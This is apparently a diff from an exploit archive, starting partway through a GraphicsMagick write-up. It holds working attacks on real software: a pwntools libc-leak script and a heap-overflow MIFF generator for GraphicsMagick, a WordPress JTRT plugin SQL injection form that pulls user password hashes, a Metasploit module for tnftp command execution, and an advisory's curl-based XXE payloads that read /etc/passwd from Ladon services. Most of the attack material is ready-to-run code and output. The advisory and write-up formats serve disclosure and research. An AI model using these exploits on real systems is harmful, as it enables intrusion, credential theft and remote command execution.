The 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.
41 41 41 - padding
1C - sentinel check in line 662
00 - padding
0A - "Priority" tag
08 00 - 8 in big endian, the length
If we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.
gef x/xw 0x00007ffff690fba8
0x7ffff690fba8 <main_arena+136>: 0x008cdc40
gef vmmap libc
Start End Offset Perm Path
0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x
/lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---
/lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--
/lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-
/lib/x86_64-linux-gnu/libc-2.23.so
Now we can calculate the offset to libc base 0x3c4b98
Proof of Concept
$ python miff/readexploit.py
[+] Starting local process /usr/bin/gm: pid 20019
[+] Receiving all data: Done (1.27KB)
[*] Process /usr/bin/gm stopped with exit code 0 (pid 20019)
[*] Main Arena Leak: 0x7f72948adb98
[*] libc Base: 0x7f72944e9000
#!/usr/bin/python
# GraphicsMagick IPTC Profile libc Leak
from pwn import *
directory = "DIR"
partitions = ('id=ImageMagick version=1.0\nclass=DirectClass matte=False\n' +
'columns=1 rows=1 depth=16\nscene=1\nmontage=1x1+0+0\nprofil' +
'e-iptc=',
'\n\x0c\n:\x1a',
'\n\x00',
'\n\x00\xbe\xbe\xbe\xbe\xbe\xbe\n')
output = "readexploit.miff"
length = 8
#libc_main_arena_entry_offset = 0x3c4ba8
libc_main_arena_entry_offset = 0x3c4b98
def main():
data = "AAA" + "\x1c" + "\x00" + chr(10) + p16(0x8, endian="big")
header = partitions[0] + str(length) + partitions[1]
payload = header + directory + partitions[2] + data + partitions[3]
file(output, "w").write(payload)
p = process(executable="gm", argv=["identify", "-verbose", output])
output_leak = p.recvall()
priority_offset = output_leak.index("Priority:") + 12
montage_offset = output_leak.index("Montage:") - 3
leak = output_leak[priority_offset:montage_offset]
if "0x00000000" in leak:
log.info("Unlucky run. Value corrupted by StringToList")
exit()
main_arena_leak = u64(leak.ljust(8, "\x00"))
log.info("Main Arena Leak: 0x%x" % main_arena_leak)
libc_base = main_arena_leak - libc_main_arena_entry_offset
log.info("libc Base: 0x%x" % libc_base)
if __name__ == "__main__":
main()
Heap Overflow
GraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.
The call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.
844 /*
845 Display visual image directory.
846 */
847 image_info=CloneImageInfo((ImageInfo *) NULL);
848 (void) CloneString(&image_info->size,"64x64");
849 (void) fprintf(file," Directory:\n");
850 for (p=image->directory; *p != '\0'; p++)
851 {
852 q=p;
853 while ((*q != '\n') && (*q != '\0'))
854 q++;
855 (void) strncpy(image_info->filename,p,q-p);
856 image_info->filename[q-p]='\0';
857 p=q;
...
880 }
881 DestroyImageInfo(image_info);
Since the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.
type = struct _ImageInfo {
...
FILE *file;
char magick[2053];
char filename[2053];
_CacheInfoPtr_ cache;
void *definitions;
Image *attributes;
unsigned int ping;
PreviewType preview_type;
unsigned int affirm;
_BlobInfoPtr_ blob;
size_t length;
char unique[2053];
char zero[2053];
unsigned long signature;
}
One possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.
Proof of Concept
The following proof of concept script will generate a specially crafted MIFF file exploit.miff.
'''
#!/usr/bin/python
from pwn import *
partitions = ('id=ImageMagick version=1.0\nclass=DirectClass matte=False\n' +
'columns=1 rows=1 depth=16\nscene=1\nmontage=1x1+0+0\n\x0c\n' +
':\x1a',
'\n\x00\xbe\xbe\xbe\xbe\xbe\xbe\n')
output = "exploit.miff"
def main():
payload = "A"*10000
payload = partitions[0] + payload + partitions[1]
file(output, "w").write(payload)
if __name__ == "__main__":
main()
'''
Running the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.
gef r identify -verbose exploit.miff
...
gef br describe.c:856
Breakpoint 1 at 0x4571df: file magick/describe.c, line 856.
...
gef p *image_info
$3 = {
...
compression = UndefinedCompression,
file = 0x0,
magick = '\000' <repeats 2052 times>,
filename = 'A' <repeats 2053 times>,
cache = 0x4141414141414141,
definitions = 0x4141414141414141,
attributes = 0x4141414141414141,
ping = 0x41414141,
preview_type = 1094795585,
affirm = 0x41414141,
blob = 0x4141414141414141,
length = 0x4141414141414141,
unique = 'A' <repeats 2053 times>,
zero = 'A' <repeats 2053 times>,
signature = 0x4141414141414141
}
'''

44
platforms/php/webapps/43110.txt Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: JTRT Responsive Tables 4.1 WordPress Plugin Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/jtrt-responsive-tables/
# Software Link: https://wordpress.org/plugins/jtrt-responsive-tables/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 4.1
# Tested on: Ubuntu 16.04
Description:
Type user acces: single user.
$_POST[tableId] is not escaped.
http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/
File / Code:
Path: /wp-content/plugins/jtrt-responsive-tables/admin/class-jtrt-responsive-tables-admin.php
Line : 183
$getTableId = $_POST['tableId'];
...
$retrieve_data = $wpdb->get_results( "SELECT * FROM $jtrt_tables_name WHERE jttable_IDD = " . $getTableId );
Proof of Concept:
1 Log in with single user.
2 Using form, sqli by post:
<form method="post" action="http://target.dev/wp-admin/admin-ajax.php?action=get_old_table">
<input type="text" name="tableId" value="1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID=1">
<input type="submit" name="">
</form>
08/09/2017 Discovered
11/09/2017 Vendor finded
03/11/2017 Publish

77
platforms/unix/remote/43112.rb Executable file
View file

@ -0,0 +1,77 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'tnftp "savefile" Arbitrary Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in
tnftp's handling of the resolved output filename - called "savefile" in
the source - from a requested resource.
If tnftp is executed without the -o command-line option, it will resolve
the output filename from the last component of the requested resource.
If the output filename begins with a "|" character, tnftp will pass the
fetched resource's output to the command directly following the "|"
character through the use of the popen() function.
},
'Author' => [
'Jared McNeill', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['CVE', '2014-8517'],
['URL', 'http://seclists.org/oss-sec/2014/q4/459']
],
'DisclosureDate' => 'Oct 28 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {'BadChars' => '/'},
'Targets' => [['ftp(1)', {}]],
'DefaultTarget' => 0
))
end
def on_request_uri(cli, request)
unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
print_status("#{request['User-Agent']} connected")
send_not_found(cli)
return
end
if request.uri.ends_with?(sploit)
send_response(cli, '')
print_good("Executing `#{payload.encoded}'!")
report_vuln(
:host => cli.peerhost,
:name => self.name,
:refs => self.references,
:info => request['User-Agent']
)
else
print_status("#{request['User-Agent']} connected")
print_status('Redirecting to exploit...')
send_redirect(cli, sploit_uri)
end
end
def sploit_uri
(get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
Rex::Text.uri_encode(sploit, 'hex-all')
end
def sploit
"|#{payload.encoded}"
end
end

246
platforms/xml/webapps/43113.txt Executable file
View file

@ -0,0 +1,246 @@
Advisory: XML External Entity Expansion in Ladon Webservice
Attackers who can send SOAP messages to a Ladon webservice via the HTTP
interface of the Ladon webservice can exploit an XML external entity expansion
vulnerability and read local files, forge server side requests or overload the
service with exponentially growing memory payloads.
Details
=======
Product: Ladon Framework for Python
Affected Versions: 0.9.40 and previous
Fixed Versions: none
Vulnerability Type: XML External Entity Expansion
Security Risk: high
Vendor URL: http://ladonize.org
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
"Ladon is a framework for exposing methods to several Internet service
protocols. Once a method is ladonized it is automatically served through all
the interfaces that your ladon installation contains. Ladon's interface
implemetations are added in a modular fashion making it very easy [sic] extend
Ladon's protocol support. Ladon runs on all Major OS's[sic] (Windows, Mac and
Linux) and supports both Python 2 and 3."
From the vendor's website[1]
More Details
============
Ladon allows developers to expose functions of a class via different
webservice protocols by using the @ladonize decorator in Python. By
using the WSGI interface of a webserver or by running the Ladon command
line tool "ladon-2.7-ctl" with the command "testserve" and the name of
the Python file, the webservices can be accessed via HTTP.
As a simple example, the following Python file "helloservice.py" was
implemented:
------------------------------------------------------------------------
from ladon.ladonizer import ladonize
class HelloService(object):
@ladonize(unicode, rtype=unicode)
def sayhello(self, uid):
return u"Hello {0}".format(uid)
------------------------------------------------------------------------
This function can then be run as a ladon webservice via the following
command:
------------------------------------------------------------------------
ladon-2.7-ctl testserve helloservice.py -p 8000
------------------------------------------------------------------------
This enables access to the "sayhello"-function via SOAP- and JSON-APIs.
The following command will send an HTTP SOAP request, which will trigger the
function:
------------------------------------------------------------------------
curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://localhost:8888/HelloService/soap11/sayhello\"' \
--data-binary $'<soapenv:Envelope
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:HelloService\"><soapenv:Header/><soapenv:Body>
<urn:sayhello soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">RedTeam Pentesting</uid>
</urn:sayhello></soapenv:Body></soapenv:Envelope>' \
'http://localhost:8888/HelloService/soap11' | xmllint --format -
------------------------------------------------------------------------
This will generate the following output:
------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ns="urn:HelloService" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<ns:sayhelloResponse>
<result>Hello RedTeam Pentesting</result>
</ns:sayhelloResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------------------------------------------------------------
The SOAP-API of this service is susceptible to an XML external entity
expansion.
Proof of Concept
================
By including a DTD in the XML SOAP request, attackers are able to include
external entities in the response of the server. In the case of the simple
service the inclusion of the following DTD will result in the exposure of the
"/etc/passwd"-file on the server:
------------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE uid [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
------------------------------------------------------------------------
The following command exploits this vulnerability by including the &passwd;
entity as the username in the request:
------------------------------------------------------------------------
curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://localhost:8888/HelloService/soap11/sayhello\"' \
--data-binary $'<?xml version="1.0"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:HelloService\"><soapenv:Header/>
<soapenv:Body>
<urn:sayhello soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">&passwd;</uid>
</urn:sayhello>
</soapenv:Body>
</soapenv:Envelope>' \
'http://localhost:8888/HelloService/soap11' | xmllint --format -
------------------------------------------------------------------------
The server answers with a response containing the passwd-file:
------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ns="urn:HelloService"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<ns:sayhelloResponse>
<result>Hello root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:[...]</result>
</ns:sayhelloResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------------------------------------------------------------
Workaround
==========
The Python package defusedxml [2] can be used to monkey patch the code to
prevent XML vulnerabilities. The following workaround can be included in the
code, which prevents exploitation:
------------------------------------------------------------------------
[...]
import defusedxml
defusedxml.defuse_stdlib()
[...]
------------------------------------------------------------------------
Fix
===
Currently no fix is available.
Security Risk
=============
Attackers are able to read local files on the server of the webservice
with the privileges of the webservice. Furthermore, attackers are able
to create HTTP request from the webservice to other services on the
Internet or the local network. It is likely that attackers are able to
gain access to credentials for database services used by the webservice.
Attackers may also be able to cause a denial-of-service attack against
the respective webservice. Depending on the data stored on the
vulnerable system and the relevance of the webservice, this
vulnerability may pose a high risk.
Timeline
========
2016-11-29 Vulnerability identified
2016-11-29 Customer notified vendor
2017-07-10 Customer fixed problem in their own product
2017-07-21 RedTeam Pentesting notified vendor
2017-08-11 RedTeam Pentesting asked vendor for status update
2017-09-08 RedTeam Pentesting asked vendor for status update and announced
public release for end of October
2017-10-09 RedTeam Pentesting asked vendor for status update
2017-11-03 Advisory released (no reply from vendor to status update requests)
References
==========
[1] http://ladonize.org
[2] https://pypi.python.org/pypi/defusedxml
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschaftsfuhrer: Patrick Hof, Jens Liebchen